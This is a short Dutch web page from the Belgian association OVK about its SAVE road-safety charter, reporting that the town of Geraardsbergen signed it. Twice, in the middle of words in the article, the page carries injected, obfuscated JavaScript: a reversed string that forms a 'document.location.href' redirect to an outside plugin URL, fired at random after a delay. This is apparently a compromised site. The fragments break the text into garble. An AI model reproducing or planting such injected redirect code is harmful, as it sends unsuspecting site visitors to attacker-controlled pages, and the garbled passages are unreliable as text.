Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Geraardsbergen ondertekent SAVE-charter

Op woensdag 22 oktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tober ondertekende Geraardsbergen als 35e Vlaamse gemeente/stad het SAVE-charter.

De dienst verkeer in Geraardsbergen heeft steeds een extra waakzaamheid getoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toond voor de verkeersveiligheid van de jeugd. Maar met deze ondertekening willen ze nog een stapje verder gaan. Onder andere de opmaak van een schoolrouteplan en aandacht voor Trage Wegen zijn actiepunten die de stad  zal opnemen in hun actieplan. Ook het uitvoeren van snelheidscontroles door de politie zijn voor de stad prioritair.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be